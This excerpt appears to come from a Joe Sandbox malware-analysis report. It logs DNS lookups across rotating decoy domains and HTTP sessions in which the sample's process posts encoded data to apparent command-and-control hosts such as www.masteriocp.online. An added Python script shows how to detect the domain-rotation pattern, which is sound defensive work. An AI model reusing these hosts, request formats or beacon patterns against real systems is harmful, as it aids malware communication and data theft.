                  Sep 14, 2024 11:13:11.773127079 CEST4976480192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:11.778156042 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778187990 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778242111 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778254032 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778264999 CEST804976484.32.84.32192.168.2.4
Sep 14, 2024 11:13:11.778276920 CEST | 80 | 49764 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:11.778296947 CEST | 80 | 49764 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:11.778309107 CEST | 80 | 49764 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:11.778320074 CEST | 80 | 49764 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:12.238394022 CEST | 80 | 49764 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:12.239819050 CEST | 49764 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:13.377696037 CEST | 49764 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:13.382667065 CEST | 80 | 49764 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.383676052 CEST | 49765 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:14.388602972 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.388792992 CEST | 49765 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:14.399672031 CEST | 49765 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:14.404534101 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891726017 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891815901 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891834021 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891849041 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891864061 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891877890 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891892910 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891906977 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891921997 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891931057 CEST | 49765 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:14.891932011 CEST | 49765 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:14.891947031 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.891971111 CEST | 49765 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:14.891994953 CEST | 49765 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:14.892076015 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Sep 14, 2024 11:13:14.892179966 CEST | 49765 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:14.896121025 CEST | 49765 | 80 | 192.168.2.4 | 84.32.84.32
Sep 14, 2024 11:13:14.900942087 CEST | 80 | 49765 | 84.32.84.32 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 14, 2024 11:11:04.888264894 CEST | 56445 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:11:04.924459934 CEST | 53 | 56445 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:11:09.946341991 CEST | 52888 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:11:10.956917048 CEST | 52888 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:11:11.575210094 CEST | 53 | 52888 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:11:11.575228930 CEST | 53 | 52888 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:11:28.006645918 CEST | 56772 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:11:28.568342924 CEST | 53 | 56772 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:11:42.131496906 CEST | 55763 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:11:42.385333061 CEST | 53 | 55763 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:11:55.633424997 CEST | 52593 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:11:56.315817118 CEST | 53 | 52593 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:12:10.009664059 CEST | 62036 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:12:10.634450912 CEST | 53 | 62036 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:12:23.789719105 CEST | 63443 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:12:23.799879074 CEST | 53 | 63443 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:12:31.870064020 CEST | 57540 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:12:32.011194944 CEST | 53 | 57540 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:12:45.163578987 CEST | 57987 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:12:45.207256079 CEST | 53 | 57987 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:12:58.555664062 CEST | 65023 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:12:58.564555883 CEST | 53 | 65023 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:13:06.631799936 CEST | 57103 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:13:06.659496069 CEST | 53 | 57103 | 1.1.1.1 | 192.168.2.4
Sep 14, 2024 11:13:20.303826094 CEST | 58844 | 53 | 192.168.2.4 | 1.1.1.1
Sep 14, 2024 11:13:20.823889017 CEST | 53 | 58844 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 14, 2024 11:11:04.888264894 CEST | 192.168.2.4 | 1.1.1.1 | 0x9c09 | Standard query (0) | www.linkbasic.net | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:09.946341991 CEST | 192.168.2.4 | 1.1.1.1 | 0x8023 | Standard query (0) | www.chamadaslotgiris.net | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:10.956917048 CEST | 192.168.2.4 | 1.1.1.1 | 0x8023 | Standard query (0) | www.chamadaslotgiris.net | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:28.006645918 CEST | 192.168.2.4 | 1.1.1.1 | 0xca7b | Standard query (0) | www.masteriocp.online | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:42.131496906 CEST | 192.168.2.4 | 1.1.1.1 | 0x2495 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:55.633424997 CEST | 192.168.2.4 | 1.1.1.1 | 0xb490 | Standard query (0) | www.independent200.org | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:10.009664059 CEST | 192.168.2.4 | 1.1.1.1 | 0x6fa3 | Standard query (0) | www.tigre777gg.online | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:23.789719105 CEST | 192.168.2.4 | 1.1.1.1 | 0xc6a4 | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:31.870064020 CEST | 192.168.2.4 | 1.1.1.1 | 0x82a0 | Standard query (0) | www.personal-loans-jp8.xyz | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:45.163578987 CEST | 192.168.2.4 | 1.1.1.1 | 0xfe66 | Standard query (0) | www.quantumnests.xyz | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:58.555664062 CEST | 192.168.2.4 | 1.1.1.1 | 0x225f | Standard query (0) | www.abbabyfernando.online | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:13:06.631799936 CEST | 192.168.2.4 | 1.1.1.1 | 0xf183 | Standard query (0) | www.parcelfly.net | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:13:20.303826094 CEST | 192.168.2.4 | 1.1.1.1 | 0x77dc | Standard query (0) | www.siyue.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 14, 2024 11:11:04.924459934 CEST | 1.1.1.1 | 192.168.2.4 | 0x9c09 | Name error (3) | www.linkbasic.net | none | none | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:11.575210094 CEST | 1.1.1.1 | 192.168.2.4 | 0x8023 | No error (0) | www.chamadaslotgiris.net | chamadaslotgiris.net |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 14, 2024 11:11:11.575210094 CEST | 1.1.1.1 | 192.168.2.4 | 0x8023 | No error (0) | chamadaslotgiris.net |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:11.575210094 CEST | 1.1.1.1 | 192.168.2.4 | 0x8023 | No error (0) | chamadaslotgiris.net |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:11.575228930 CEST | 1.1.1.1 | 192.168.2.4 | 0x8023 | No error (0) | www.chamadaslotgiris.net | chamadaslotgiris.net |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 14, 2024 11:11:11.575228930 CEST | 1.1.1.1 | 192.168.2.4 | 0x8023 | No error (0) | chamadaslotgiris.net |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:11.575228930 CEST | 1.1.1.1 | 192.168.2.4 | 0x8023 | No error (0) | chamadaslotgiris.net |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:28.568342924 CEST | 1.1.1.1 | 192.168.2.4 | 0xca7b | No error (0) | www.masteriocp.online | dns.ladipage.com |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 14, 2024 11:11:28.568342924 CEST | 1.1.1.1 | 192.168.2.4 | 0xca7b | No error (0) | dns.ladipage.com |  | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:28.568342924 CEST | 1.1.1.1 | 192.168.2.4 | 0xca7b | No error (0) | dns.ladipage.com |  | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:28.568342924 CEST | 1.1.1.1 | 192.168.2.4 | 0xca7b | No error (0) | dns.ladipage.com |  | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:42.385333061 CEST | 1.1.1.1 | 192.168.2.4 | 0x2495 | No error (0) | www.mediaplug.biz |  | 66.81.203.10 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:42.385333061 CEST | 1.1.1.1 | 192.168.2.4 | 0x2495 | No error (0) | www.mediaplug.biz |  | 66.81.203.135 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:42.385333061 CEST | 1.1.1.1 | 192.168.2.4 | 0x2495 | No error (0) | www.mediaplug.biz |  | 66.81.203.200 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:11:56.315817118 CEST | 1.1.1.1 | 192.168.2.4 | 0xb490 | No error (0) | www.independent200.org |  | 103.42.108.46 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:10.634450912 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fa3 | No error (0) | www.tigre777gg.online | tigre777gg.online |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 14, 2024 11:12:10.634450912 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fa3 | No error (0) | tigre777gg.online |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:10.634450912 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fa3 | No error (0) | tigre777gg.online |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:23.799879074 CEST | 1.1.1.1 | 192.168.2.4 | 0xc6a4 | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:32.011194944 CEST | 1.1.1.1 | 192.168.2.4 | 0x82a0 | No error (0) | www.personal-loans-jp8.xyz |  | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:45.207256079 CEST | 1.1.1.1 | 192.168.2.4 | 0xfe66 | No error (0) | www.quantumnests.xyz |  | 162.0.239.141 | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:12:58.564555883 CEST | 1.1.1.1 | 192.168.2.4 | 0x225f | Name error (3) | www.abbabyfernando.online | none | none | A (IP address) | IN (0x0001) | false
Sep 14, 2024 11:13:06.659496069 CEST | 1.1.1.1 | 192.168.2.4 | 0xf183 | No error (0) | www.parcelfly.net | parcelfly.net |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 14, 2024 11:13:06.659496069 CEST | 1.1.1.1 | 192.168.2.4 | 0xf183 | No error (0) | parcelfly.net |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
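The query table above shows a single client working through thirteen lookups for twelve unrelated names across six TLDs in about two minutes, three of them NXDOMAIN, and two of the names (chamadaslotgiris.net, tigre777gg.online) resolving to the same pair of addresses. That shape is what a DNS-side detection has to catch. The following Python script is an added example, not part of the Joe Sandbox report; it replays the events transcribed from the tables above (www.siyue.xyz omitted because its answer is not in this excerpt) through a sliding-window detector. The five-minute window, the thresholds and the two-label registrable-domain approximation are assumptions chosen to fit this capture.

```python
"""Sliding-window detector for the decoy-domain rotation visible in the DNS
tables above: one client resolving many unrelated domains in a short span,
several of them NXDOMAIN, some sharing the same hosting addresses."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed test input, transcribed from the DNS query/answer tables above.
# Tuple: (client IP, timestamp, query name, answer); answer is the list of
# A records returned, or None for "Name error (3)" (NXDOMAIN).
DNS_EVENTS = [
    ("192.168.2.4", "2024-09-14 11:11:04.888", "www.linkbasic.net", None),
    ("192.168.2.4", "2024-09-14 11:11:09.946", "www.chamadaslotgiris.net",
     ["3.33.130.190", "15.197.148.33"]),
    ("192.168.2.4", "2024-09-14 11:11:10.956", "www.chamadaslotgiris.net",
     ["3.33.130.190", "15.197.148.33"]),
    ("192.168.2.4", "2024-09-14 11:11:28.006", "www.masteriocp.online",
     ["18.139.62.226", "54.179.173.60", "13.228.81.39"]),
    ("192.168.2.4", "2024-09-14 11:11:42.131", "www.mediaplug.biz",
     ["66.81.203.10", "66.81.203.135", "66.81.203.200"]),
    ("192.168.2.4", "2024-09-14 11:11:55.633", "www.independent200.org", ["103.42.108.46"]),
    ("192.168.2.4", "2024-09-14 11:12:10.009", "www.tigre777gg.online",
     ["3.33.130.190", "15.197.148.33"]),
    ("192.168.2.4", "2024-09-14 11:12:23.789", "www.monos.shop", None),
    ("192.168.2.4", "2024-09-14 11:12:31.870", "www.personal-loans-jp8.xyz", ["199.59.243.226"]),
    ("192.168.2.4", "2024-09-14 11:12:45.163", "www.quantumnests.xyz", ["162.0.239.141"]),
    ("192.168.2.4", "2024-09-14 11:12:58.555", "www.abbabyfernando.online", None),
    ("192.168.2.4", "2024-09-14 11:13:06.631", "www.parcelfly.net", ["84.32.84.32"]),
]

TS_FMT = "%Y-%m-%d %H:%M:%S.%f"


def registrable(name):
    """Approximate the registrable domain as the last two labels.
    Assumption: adequate for the gTLD names in this capture; a real deployment
    should use the Public Suffix List so example.co.uk is not reduced to co.uk."""
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def analyse_client(events, client, window=timedelta(minutes=5),
                   min_domains=8, min_nxdomain=2):
    """Slide `window` over one client's queries and return the summary of the
    window with the most distinct domains (None if the client has no queries).
    The thresholds are assumptions tuned to this capture, not malware constants."""
    rows = sorted(
        ((datetime.strptime(ts, TS_FMT), name, answer)
         for c, ts, name, answer in events if c == client),
        key=lambda r: r[0],
    )
    best = None
    for t0, _, _ in rows:
        win = [r for r in rows if t0 <= r[0] < t0 + window]
        domains = {registrable(name) for _, name, _ in win}
        nxdomain = {name for _, name, answer in win if answer is None}
        ip_to_domains = defaultdict(set)
        for _, name, answer in win:
            for ip in answer or []:
                ip_to_domains[ip].add(registrable(name))
        summary = {
            "window_start": t0.isoformat(),
            "queries": len(win),
            "distinct_domains": len(domains),
            "tlds": len({d.rsplit(".", 1)[-1] for d in domains}),
            "nxdomain": len(nxdomain),
            # Addresses answered for more than one domain: parking, sinkhole or
            # attacker hosting reused across decoys; a useful pivot either way.
            "shared_ips": {ip: sorted(d) for ip, d in ip_to_domains.items()
                           if len(d) > 1},
        }
        summary["suspicious"] = (summary["distinct_domains"] >= min_domains
                                 and summary["nxdomain"] >= min_nxdomain)
        if best is None or summary["distinct_domains"] > best["distinct_domains"]:
            best = summary
    return best


if __name__ == "__main__":
    for key, value in analyse_client(DNS_EVENTS, "192.168.2.4").items():
        print(f"{key}: {value}")
```

The per-window counting is quadratic, which is fine for a passive-DNS export of one host but should become a deque-based sliding window over a sorted stream before it is pointed at a resolver log. The `shared_ips` output is deliberately kept even when the window is not flagged: 3.33.130.190 and 15.197.148.33 answering for two otherwise unrelated names is the kind of pivot that survives the operator rotating the domain list.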
                  • www.chamadaslotgiris.net
                  • www.masteriocp.online
                  • www.mediaplug.biz
                  • www.independent200.org
                  • www.tigre777gg.online
                  • www.personal-loans-jp8.xyz
                  • www.quantumnests.xyz
                  • www.parcelfly.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 3.33.130.190 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 14, 2024 11:11:11.594907045 CEST | 518 | OUT | GET /gqyt/?gd=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.chamadaslotgiris.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 14, 2024 11:11:12.967840910 CEST | 396 | IN | HTTP/1.1 200 OK
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:12 GMT
                  Content-Type: text/html
                  Content-Length: 256
                  Connection: close
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 64 3d 4e 5a 65 53 70 2f 4d 38 42 6b 49 4c 44 6d 78 73 32 42 37 68 49 6c 58 62 70 56 74 43 6d 45 58 52 47 69 66 7a 30 2f 74 6d 56 69 32 62 31 6f 56 4f 35 4e 65 48 65 4c 32 75 6c 7a 4f 6e 66 34 49 79 32 63 74 6a 45 76 53 38 33 34 77 30 35 67 4d 73 36 4d 51 79 69 48 4e 48 37 44 50 6c 6f 4c 66 53 6e 47 6c 6c 43 78 79 35 30 44 44 2f 74 4f 6e 2f 6e 69 4c 73 78 49 6b 3d 26 61 30 3d 5f 36 45 64 7a 76 6a 30 78 74 46 4c 64 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gd=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&a0=_6Edzvj0xtFLdH"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 18.139.62.226 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 14, 2024 11:11:28.590806961 CEST | 787 | OUT | POST /p5rq/ HTTP/1.1
                  Host: www.masteriocp.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.masteriocp.online
                  Referer: http://www.masteriocp.online/p5rq/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 7a 67 70 6e 4e 70 74 51 59 2b 33 76 79 50 2b 33 77 41 68 36 44 78 45 70 6d 5a 61 69 36 2b 53 6f 67 3d 3d
                  Data Ascii: gd=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uzgpnNptQY+3vyP+3wAh6DxEpmZai6+Sog==
Sep 14, 2024 11:11:29.516406059 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:29 GMT
                  Content-Type: text/html
                  Content-Length: 166
                  Connection: close
                  Location: https://www.masteriocp.online/p5rq/
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 18.139.62.226 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 14, 2024 11:11:31.131051064 CEST | 807 | OUT | POST /p5rq/ HTTP/1.1
                  Host: www.masteriocp.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.masteriocp.online
                  Referer: http://www.masteriocp.online/p5rq/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 6c 33 76 61 38 74 69 75 75 61 74 68 4a 79 67 67 52 48 76 72 4a 6f 7a 47 6d 45 4d 50 57 55 54 66 4e 6e 78 59 61 2f 64 70 63 35 55 57 30 59 51 53 46 35 4c 76 64 2b 76 38 4e 6b 6d 48 49 33 4f 45 6c 32 48 36 75 54 75 5a 64 71 75 46 53 6e 6d 6c 46 56 2f 4a 2b 61 73 5a 71 64 54 74 49 6b 66 76 5a 38 61 34 47 6e 2f 71 47 42 62 38 73 50 33 4d 31 48 4f 6c 32 67 32 78 56 2b 34 76 70 63 5a 39 61 58 6a 55 65 6b 6d 42 68 32 6f 44 56 33 30 68 51 75 76 35 44 62 7a 6e 77 52 56 41 71 6a 71 36 69 79 31 75 37 51 2f 4d 68 6a 54 78 30 3d
                  Data Ascii: gd=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHl3va8tiuuathJyggRHvrJozGmEMPWUTfNnxYa/dpc5UW0YQSF5Lvd+v8NkmHI3OEl2H6uTuZdquFSnmlFV/J+asZqdTtIkfvZ8a4Gn/qGBb8sP3M1HOl2g2xV+4vpcZ9aXjUekmBh2oDV30hQuv5DbznwRVAqjq6iy1u7Q/MhjTx0=
Sep 14, 2024 11:11:32.058912039 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:31 GMT
                  Content-Type: text/html
                  Content-Length: 166
                  Connection: close
                  Location: https://www.masteriocp.online/p5rq/
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 18.139.62.226 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 14, 2024 11:11:33.677061081 CEST | 10889 | OUT | POST /p5rq/ HTTP/1.1
                  Host: www.masteriocp.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.masteriocp.online
                  Referer: http://www.masteriocp.online/p5rq/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
